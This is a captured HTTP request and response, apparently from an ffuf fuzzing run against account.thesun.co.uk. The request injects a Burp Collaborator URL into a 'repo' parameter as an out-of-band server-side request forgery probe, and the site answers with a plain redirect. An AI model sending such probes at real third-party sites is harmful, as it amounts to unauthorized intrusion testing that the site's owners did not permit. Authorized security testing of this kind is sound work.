GET /?repo=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: account.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 302 Found
Content-Length: 43
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-transform
Cf-Cache-Status: DYNAMIC
Cf-Ray: 64142a7b5b97d9c0-SIN
Cf-Request-Id: 098078e11c0000d9c09b9d0000000001
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Date: Sat, 17 Apr 2021 08:08:31 GMT
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Location: https://thesun.co.uk/
Ot-Baggage-Auth0-Request-Id: 64142a7b5b97d9c0
Ot-Tracer-Sampled: true
Ot-Tracer-Spanid: 2b610f507713b39f
Ot-Tracer-Traceid: 1f86cea96c6d2f9e
Server: cloudflare
Set-Cookie: __cfduid=d82190c12c7ea5fd6f565aa46e0f69f2e1618646911; expires=Mon, 17-May-21 08:08:31 GMT; path=/; domain=.account.thesun.co.uk; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000
Vary: Accept, Accept-Encoding
X-Auth0-Requestid: a5e91260bedcd8fe4f5a
X-Content-Type-Options: nosniff

Found. Redirecting to https://thesun.co.uk/